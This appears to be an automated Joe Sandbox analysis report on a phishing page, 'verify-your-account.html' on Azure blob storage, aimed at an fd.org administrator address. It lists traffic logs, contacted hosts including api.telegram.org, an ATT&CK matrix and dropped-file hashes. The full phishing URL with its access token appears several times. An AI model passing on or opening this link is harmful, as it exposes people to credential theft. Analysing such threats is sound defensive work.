          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownHTTPS traffic detected: 88.221.168.226:443 -> 192.168.2.16:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 88.221.168.226:443 -> 192.168.2.16:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49744 version: TLS 1.2
          Source: classification engineClassification label: mal68.phis.troj.win@19/58@50/291
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1956,i,18158348067939035644,14319374120374209309,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.org"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1956,i,18158348067939035644,14319374120374209309,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          Browser Extensions
          1
          Process Injection
          1
          Masquerading
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Web Service
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          Registry Run Keys / Startup Folder
          1
          Registry Run Keys / Startup Folder
          1
          Process Injection
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging1
          Ingress Tool Transfer
          Scheduled TransferData Encrypted for Impact

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.org0%Avira URL Cloudsafe
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://www.fd.org/0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          stackpath.bootstrapcdn.com
          104.18.10.207
          truefalse
            high
            d26p066pn2w0s0.cloudfront.net
            13.227.8.64
            truefalse
              high
              fd.org
              206.16.244.31
              truefalse
                unknown
                code.jquery.com
                151.101.194.137
                truefalse
                  high
                  cdnjs.cloudflare.com
                  104.17.24.14
                  truefalse
                    high
                    ipinfo.io
                    34.117.59.81
                    truefalse
                      high
                      maxcdn.bootstrapcdn.com
                      104.18.10.207
                      truefalse
                        high
                        www.google.com
                        142.250.181.100
                        truefalse
                          high
                          image.thum.io
                          54.174.1.1
                          truefalse
                            high
                            api.telegram.org
                            149.154.167.220
                            truefalse
                              high
                              dns.google
                              8.8.8.8
                              truefalse
                                high
                                ka-f.fontawesome.com
                                unknown
                                unknownfalse
                                  high
                                  kit.fontawesome.com
                                  unknown
                                  unknownfalse
                                    high
                                    www.fd.org
                                    unknown
                                    unknowntrue
                                      unknown
                                      logo.clearbit.com
                                      unknown
                                      unknownfalse
                                        high
                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.fd.org/false
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.fd.org/false
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          172.64.147.188
                                          unknownUnited States
                                          13335CLOUDFLARENETUSfalse
                                          172.217.19.206
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          104.18.10.207
                                          stackpath.bootstrapcdn.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          8.8.4.4
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          216.58.208.227
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          172.217.19.202
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          8.8.8.8
                                          dns.googleUnited States
                                          15169GOOGLEUSfalse
                                          142.250.181.138
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          149.154.167.220
                                          api.telegram.orgUnited Kingdom
                                          62041TELEGRAMRUfalse
                                          142.250.181.136
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          57.150.27.161
                                          unknownBelgium
                                          2686ATGS-MMD-ASUSfalse
                                          206.16.244.31
                                          fd.orgUnited States
                                          13788USCOURTSUSfalse
                                          151.101.194.137
                                          code.jquery.comUnited States
                                          54113FASTLYUSfalse
                                          104.17.24.14
                                          cdnjs.cloudflare.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          172.217.19.238
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          1.1.1.1
                                          unknownAustralia
                                          13335CLOUDFLARENETUSfalse
                                          172.217.17.78
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          34.117.59.81
                                          ipinfo.ioUnited States
                                          139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                          172.217.17.35
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          54.174.1.1
                                          image.thum.ioUnited States
                                          14618AMAZON-AESUSfalse
                                          172.67.139.119
                                          unknownUnited States
                                          13335CLOUDFLARENETUSfalse
                                          172.217.19.234
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          142.250.181.100
                                          www.google.comUnited States
                                          15169GOOGLEUSfalse
                                          104.18.11.207
                                          unknownUnited States
                                          13335CLOUDFLARENETUSfalse
                                          74.125.205.84
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          239.255.255.250
                                          unknownReserved
                                          unknownunknownfalse
                                          13.227.8.64
                                          d26p066pn2w0s0.cloudfront.netUnited States
                                          16509AMAZON-02USfalse
                                          172.217.17.74
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          13.227.8.65
                                          unknownUnited States
                                          16509AMAZON-02USfalse
                                          142.250.181.10
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          172.217.17.72
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          IP
                                          192.168.2.16
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1566771
                                          Start date and time:2024-12-02 17:02:02 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                          Sample URL:https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.org
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:13
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • EGA enabled
                                          Analysis Mode:stream
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal68.phis.troj.win@19/58@50/291
                                          • Exclude process from analysis (whitelisted): svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.19.238, 74.125.205.84, 57.150.27.161, 34.104.35.123, 142.250.181.10, 172.217.19.234, 172.64.147.188, 104.18.40.68
                                          • Not all processes where analyzed, report is missing behavior information
                                          • VT rate limit hit for: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.org
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 2 15:02:32 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2673
                                          Entropy (8bit):3.983045491214492
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:60FB39971CED4AE39E4B3CD13F6AF1BD
                                          SHA1:2D85C7A96D8A094C064B175BF1945C6625AA705C
                                          SHA-256:E8EB3F8A92E1DB9145C970812B06264B723583D7F7A396B648E55BA002C5AFD2
                                          SHA-512:76C5092FDC26809F41B233B1CECC9CDA2774566FFAF5EA40259F44D699F1306B07C4846606B76337E3330CBF00BC2C5EDB4DF8659DE77C7048F63751FECCCCD4
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,....C.r..D..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YG.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YO.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YO.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YO............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.YQ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........id%q.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 2 15:02:32 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2675
                                          Entropy (8bit):4.000112185721706
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:53AF610C63917C7A4E199104E653E53E
                                          SHA1:B5113373FF87E99EEE12E2E5601EB8930FEE283D
                                          SHA-256:5688B68BF99DB626DAE052A7033E7B65FE8A6CEE3C5F33A5C7BBD85CA5214160
                                          SHA-512:EFBE3A31578B61063037C6F01393B706DB9D84370C2A6C26ED717844828DCB4D9C147BE5C34981D5ECA1FA4F98844AE51A94EA8016814EA32F623F462C6195D7
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,......g..D..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YG.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YO.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YO.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YO............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.YQ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........id%q.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2689
                                          Entropy (8bit):4.007934026475734
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:33C2605502A0887BBD987758FD16DF9B
                                          SHA1:18C2B5C0E31F483A03B052669F571CAB99E996D8
                                          SHA-256:CE143036DD7721AD09C9B2841204F381E4D92703183E2EA2B426F275965C7134
                                          SHA-512:11CE7145FF14402F55BFAB0BE001FCA8409987BAB31B1F1AF6C7C52A6845FAF3FF00D13B1E5D60C1BBDFDE5D1CFE71E90E360AEAB88CC7F79110F7C3DA233D0F
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YG.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YO.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YO.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YO............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........id%q.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 2 15:02:32 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2677
                                          Entropy (8bit):3.9981455509710293
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:D7733D52BFDFA2989C2FB054BB9A3B3A
                                          SHA1:FB6808C578322CEC53B7489FB9A32B5B8917FBF4
                                          SHA-256:5EDC26C737099E5907969844FBF8B470350CA820ECD88DFF401C893A431B7944
                                          SHA-512:FAAD271205EA47271AAC8407740D239C046801F5A5637957BEAD9181947003278BE6350290D3FA3E069AE73ED967B77F985E24F3645FF2B38E19ECADAD22D7B9
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.....?b..D..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YG.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YO.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YO.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YO............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.YQ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........id%q.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 2 15:02:32 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2677
                                          Entropy (8bit):3.9857920529801234
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:2BEB0AD85A706E58575B15C8EEDC0001
                                          SHA1:B617CA47DE8611DA4BC19C8A996FF1C5331A241E
                                          SHA-256:0D891545C50904C6930C4CC93FBBFCE6D81DEE2E0790134DA286BD936862F967
                                          SHA-512:F680CFA9C45F60FD170A83CB3BE6411AE2CC469FAAAD2F1666A1ECD317C5EF0BA629B710D1ADD5CCE76F107C977B4E1FC968D9D3BBF6525DBBF6E56AB66D067A
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,....C<m..D..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YG.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YO.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YO.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YO............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.YQ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........id%q.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 2 15:02:32 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2679
                                          Entropy (8bit):3.9974271652853837
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:4D2DE4880E551657073BAF5E78594810
                                          SHA1:B8342AC6AC0FB43A1C190D009536AE17582A5202
                                          SHA-256:9F470513683D96D524329C560DA3C331878D1016B087523A1BA9E800ABABC53F
                                          SHA-512:1788823C85801A3BD5A3B07B11330E26CEAB682BD325D1EDFE6AC94308CB1A00339350F267C48224BB3FC9CAFDB8D97897C7672862271DD22505DFC4E32D8D72
                                          Malicious:false
                                          Reputation:unknown
